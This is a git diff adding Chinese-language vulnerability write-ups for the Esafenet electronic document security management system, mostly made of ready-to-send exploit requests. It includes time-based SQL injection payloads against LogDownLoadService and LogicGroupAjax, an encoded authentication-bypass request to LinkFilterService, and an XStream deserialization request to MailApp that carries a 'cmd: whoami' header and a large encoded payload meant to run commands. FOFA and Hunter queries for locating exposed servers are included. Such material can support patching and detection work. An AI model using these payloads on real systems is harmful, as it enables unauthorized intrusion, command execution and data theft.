+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/9fnUX648F-CLwGAI/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-472735.png)
+
+# 四、漏洞复现
+```java
+POST /CDGServer3/LinkFilterService HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=BCC78770D02EC6AB78EA995E2555A2C1; JSESSIONID=C64DC678312F69EFCDADCC742CF861BB
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 98
+
+path=BOFGGPFBFIFPBHFMGKGI&userId=GCGHGAGGFAFHFGFCFEFPFD&cur=DBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB
+```
+
+![1702917036931-32f2efde-09b3-4af7-b1ff-2496b8443173.png](./img/9fnUX648F-CLwGAI/1702917036931-32f2efde-09b3-4af7-b1ff-2496b8443173-251671.png)
+
+![1702916915310-737010ff-3342-4e2e-b45d-4a3bf6b28598.png](./img/9fnUX648F-CLwGAI/1702916915310-737010ff-3342-4e2e-b45d-4a3bf6b28598-758130.png)
+
+![1702916934484-4afe6db6-a57e-4e26-8eda-0f096164b942.png](./img/9fnUX648F-CLwGAI/1702916934484-4afe6db6-a57e-4e26-8eda-0f096164b942-539350.png)
+
+nuclei脚本
+
+[亿赛通电子文档安全管理系统-linkfilterservice-逻辑漏洞.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621694642-61db836c-1106-4792-8570-cba42f27bd2a.yaml)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xdgbwbrsy3d7v4i8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md
new file mode 100644
index 0000000..c916aa5
--- /dev/null
+++ b/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# 亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞
+
+## fofa
+
+```yaml
+body="/CDGServer3/index.jsp"
+```
+
+## poc
+
+```java
+POST /CDGServer3/logManagement/LogDownLoadService HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 0
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+command=downLoadLogFiles&currPage=1&fromurl=../user/dataSearch.jsp&logFileName=indsex.txt&id=-1';WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..fda9b9d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` LogicGroupAjax`接口的`logicGroupName`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-电子文档安全管理系统"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../LogicGroupAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=isExist&logicGroupName=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..b129961
--- /dev/null
+++ b/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统MailApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统MailApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/y8FWroxGA2nCEQ2w/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-294627.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/MailApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLG